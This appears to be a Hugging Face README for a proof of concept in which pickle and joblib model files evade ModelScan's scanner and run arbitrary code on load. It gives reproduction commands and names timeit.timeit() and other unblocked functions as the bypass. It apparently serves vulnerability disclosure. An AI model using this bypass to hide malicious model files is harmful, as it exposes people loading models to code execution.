Hugging Face's logo

yanivfi1978
/
modelscan-bypass-timeit-poc

Joblib
Model card Files
xet
 Community
modelscan-bypass-timeit-poc / README.md
yanivfi1978's picture
yanivfi1978
Upload README.md with huggingface_hub
9ea8e88 verified
preview code
|
raw
history blame contribute delete
1.2 kB

ModelScan Scanner Bypass PoC

Proof-of-concept model files that bypass ModelScan's pickle scanner while executing arbitrary code on load.

Files

  • malicious_timeit.pkl — Pickle file using timeit.timeit() bypass
  • malicious_timeit.joblib — Joblib file using timeit.timeit() bypass
  • create_poc.py — Script to recreate the PoC files

Reproduction 

# 1. Scan with ModelScan — reports clean
pip install modelscan
modelscan --path malicious_timeit.pkl
# Output: "No issues found!"

# 2. Load the file — executes arbitrary code
python3 -c "import pickle; pickle.load(open('malicious_timeit.pkl', 'rb'))"
# Output: uid=1000(user) ...  (id command executed)

# 3. Same for joblib
python3 -c "import joblib; joblib.load('malicious_timeit.joblib')"
# Output: uid=1000(user) ...  (id command executed)

Bypass Technique

The pickle payload uses timeit.timeit(stmt) which accepts a Python code string and executes it. The timeit module is not in ModelScan's unsafe_globals blocklist (modelscan/settings.py), so the scanner does not flag it.

Additional unblocked modules that can execute code strings: cProfile.run(), profile.run(), timeit.repeat().